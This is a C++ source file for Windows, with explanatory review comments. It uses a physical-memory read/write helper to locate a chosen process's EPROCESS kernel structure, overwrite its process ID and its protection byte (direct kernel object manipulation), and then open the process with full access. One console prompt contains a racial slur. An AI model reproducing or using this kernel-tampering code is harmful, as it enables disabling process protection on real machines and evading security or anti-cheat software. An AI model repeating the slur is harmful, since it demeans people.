#include <Windows.h>
#include <Winternl.h>
#include <TlHelp32.h>
#include <PSAPI.h>
#include <SHLWAPI.h>

#include <algorithm>
#include <cctype>
#include <codecvt>
#include <cwctype>
#include <iostream>
#include <locale>
#include <string>
#include <thread>
#include <unordered_map>
#include <vector>

#include "PMemHelper.h"
using namespace std;  // file-wide; the code below uses unqualified std names throughout

// Shorthands over the Util helpers. Being macros they expand at the use site,
// which is why they can be used inside Util itself before the class is complete.
#define A(s) Util::ToA(s)       // wide -> narrow (UTF-16 -> UTF-8)
#define W(s) Util::ToW(s)       // narrow -> wide (UTF-8 -> UTF-16)
#define LC(s) Util::ToLower(s)  // lower-case; overloaded for string and wstring
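/// String and process-lookup helpers used by main().
/// Conversions rely on std::wstring_convert (deprecated since C++17 but still
/// available); process enumeration uses the Win32 ToolHelp snapshot API.
class Util
{
public:
    /// Converts a UTF-8 narrow string to a UTF-16 wide string.
    /// @throws std::range_error if `str` is not valid UTF-8 (wstring_convert default).
    static std::wstring ToW(std::string str)
    {
        std::wstring_convert<std::codecvt_utf8_utf16<wchar_t>> converter;
        return converter.from_bytes(str);
    }

    /// Converts a UTF-16 wide string to a UTF-8 narrow string.
    /// @throws std::range_error on an unpaired surrogate (wstring_convert default).
    static std::string ToA(std::wstring wstr)
    {
        std::wstring_convert<std::codecvt_utf8_utf16<wchar_t>> converter;
        return converter.to_bytes(wstr);
    }

    /// Returns `str` with every letter lower-cased via the C-locale tolower.
    static std::string ToLower(std::string str)
    {
        // A lambda over unsigned char fixes two issues with passing the bare
        // `tolower` name: the overload set is ambiguous once <locale> is visible
        // (std::tolower(int) vs std::tolower(charT, const locale&)), and calling
        // tolower with a negative `char` is undefined behaviour.
        std::transform(str.begin(), str.end(), str.begin(),
                       [](unsigned char c) { return static_cast<char>(std::tolower(c)); });
        return str;
    }

    /// Wide-string overload of ToLower. Uses towlower so wide code points are
    /// handled by the C library instead of being funnelled through tolower(int).
    static std::wstring ToLower(std::wstring str)
    {
        std::transform(str.begin(), str.end(), str.begin(),
                       [](wchar_t c) { return static_cast<wchar_t>(std::towlower(static_cast<wint_t>(c))); });
        return str;
    }

    /// Looks up a process id by executable image name.
    /// @param name Image name (for example "notepad.exe"), compared case-insensitively.
    /// @return The id of the *last* matching process in the snapshot (the
    ///         original's semantics are kept), or 0 when nothing matches or the
    ///         snapshot cannot be taken.
    static DWORD GetProcessIdByName(std::string name)
    {
        DWORD pid = 0;
        HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        // Previously unchecked; the failure value is INVALID_HANDLE_VALUE, not NULL.
        if (snap == INVALID_HANDLE_VALUE) return 0;

        PROCESSENTRY32 entry{};
        entry.dwSize = sizeof(entry);

        // Hoisted out of the loop: the original re-converted `name` once per process.
        const std::wstring wanted = ToLower(ToW(name));

        // The comparison is on wide strings, so this assumes a UNICODE build in
        // which szExeFile is WCHAR[] (same assumption as the original code).
        if (Process32First(snap, &entry))
        {
            do
            {
                if (ToLower(std::wstring(entry.szExeFile)) == wanted)
                {
                    pid = entry.th32ProcessID;
                }
            } while (Process32Next(snap, &entry));
        }

        // The original returned early without closing on Process32First failure.
        CloseHandle(snap);
        return pid;
    }
};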
// Entry point. An interactive loop (driven by `goto start`) reads a process
// name, resolves its EPROCESS through the PMemHelper physical-memory primitive,
// writes two fields of that kernel structure, and then tries to open the
// process under the id it just wrote. Every kernel-side access goes through
// `mem`; this translation unit never touches the kernel directly.
// NOTE(review): `void main()` is not standard C++; a hosted program returns int.
// NOTE(review): `mem` is allocated with `new` and never released; since the
// loop never ends normally, any cleanup the helper does in its destructor never runs.
void main()
{
    PMemHelper* mem = new PMemHelper();
start:
    printf("\n\n");
    string tgt;
    printf("Enter target process name nigger\n");
    getline(cin, tgt);
    // 0 means "no such process" (see Util::GetProcessIdByName); when several
    // processes share the image name, the last one in the snapshot wins.
    auto targetPid = Util::GetProcessIdByName(tgt);
    if (!targetPid)
    {
        printf("process doesn't exist, try again pls\n");
        goto start;
    }
    printf("got target process Id: %d\n", targetPid);
    // Page-table roots and image bases come from the helper; their types are
    // not visible in this file. SFGetModuleBase is a free function declared elsewhere.
    auto targetDirbase = mem->GetDirBase(targetPid);
    auto targetBase = mem->GetProcessBase(targetPid);
    auto kernelDirbase = mem->GetKernelDirBase();
    auto ntoskrnlBase = SFGetModuleBase("ntoskrnl.exe");
    // NOTE(review): `%X` consumes an unsigned int; if these values are 64-bit
    // (likely for addresses) the printed output is truncated and misaligned.
    printf("target dirbase: 0x%X, target proc base: 0x%X\nkernel dirbase: 0x%X, kernel base:0x%X\n", targetDirbase, targetBase, kernelDirbase, ntoskrnlBase);
    // memory read test: read the first 255 bytes of the target's image through
    // the target's own dirbase and expect the "MZ" DOS header, which validates
    // the read primitive before anything is written.
    char buff[255];
    auto res = mem->ReadVirtual(targetDirbase, targetBase, (uint8_t*)(buff), 255);
    buff[2] = '\0';  // keep only the two-byte signature for the comparison below
    if (!res || buff != "MZ"s)
    {
        printf("memory read test failed\n");
        return;
    }
    printf("memory read test success, buff: %s\n", buff);
    auto pTargetProcessEntry = mem->GetEProcess(targetPid);// SFGetEProcess(targetPid);
    if (!pTargetProcessEntry)
    {
        printf("can't get EPROCESS address for given PID\n");
        goto start;
    }
    printf("got target EPROCESS address: 0x%X\n", pTargetProcessEntry);
    printf("press enter to do DKOM magic lol\n");
    // An empty line continues; any other input goes back to the name prompt.
    string s;
    getline(cin, s);
    if (s != "")
    {
        printf("aborting...\n");
        goto start;
    }
    // `askagain` is never jumped to; the label is dead.
askagain:
    printf("enter new ProcessId for %s:\n", tgt.c_str());
    uintptr_t newPid;
    cin >> newPid;
    printf("Setting new ProcessId...\n");
    // Writes the 8 bytes of newPid over the process-id field of the target's
    // EPROCESS (offset supplied by the helper), addressed through the kernel
    // dirbase. `res` is only checked after the second write below.
    res = mem->WriteVirtual(kernelDirbase, pTargetProcessEntry + mem->EPPidOffset, (uint8_t*)&newPid, 8);
    // 0x6CA is a hard-coded EPROCESS offset the author treats as the protection
    // byte. Unlike EPPidOffset it is not provided by the helper, and nothing in
    // this file ties it to a particular Windows build.
    // NOTE(review): the return value of this read is ignored, so `oldProtek`
    // may be printed uninitialized when the read fails.
    uint8_t oldProtek;
    mem->ReadVirtual(kernelDirbase, pTargetProcessEntry + 0x6CA, &oldProtek, 1);
    printf("Old protection: %d\n", oldProtek);
    printf("Lol enter new protection lol:\n");
    uint8_t newProtection = 0;
    // operator>> into a uint8_t (unsigned char) extracts a single character, so
    // newProtection holds that character's code rather than a parsed integer.
    cin >> newProtection;
    printf("Setting protection...\n");
    auto res1 = mem->WriteVirtual(kernelDirbase, pTargetProcessEntry + 0x6CA, &newProtection, 1);
    if (!res || !res1)
    {
        printf("magic failed\n");
        goto start;
    }
    printf("magic suceeded.\n");
    printf("Trying to open the process..\n");
    // User-mode check of the id change: opens the target under the id just
    // written. The handle is printed as a bare value (again via `%X`).
    auto htarget = OpenProcess(PROCESS_ALL_ACCESS, 0, newPid);
    printf("hTarget: 0x%X\n", htarget);
    getchar();
    goto start;
    // Unreachable: the unconditional `goto start` above never falls through.
    getchar();
    return;
}